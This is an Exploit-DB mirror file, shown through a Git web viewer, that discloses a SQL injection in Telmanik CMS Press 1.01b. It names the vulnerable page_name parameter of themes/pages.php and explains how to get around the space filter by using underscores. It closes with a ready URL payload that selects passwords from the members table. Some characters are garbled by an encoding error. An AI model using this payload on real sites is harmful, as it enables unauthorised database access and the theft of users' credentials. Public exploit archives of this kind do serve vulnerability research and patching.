exploit-db-mirror/exploits/php/webapps/27281.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
742 B
Text
Raw Blame History

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL:
http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]
you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with <20>_<EFBFBD>.
Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members
This is a special DefCon 21 kick off from me! See ya there [image: ;)]
Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny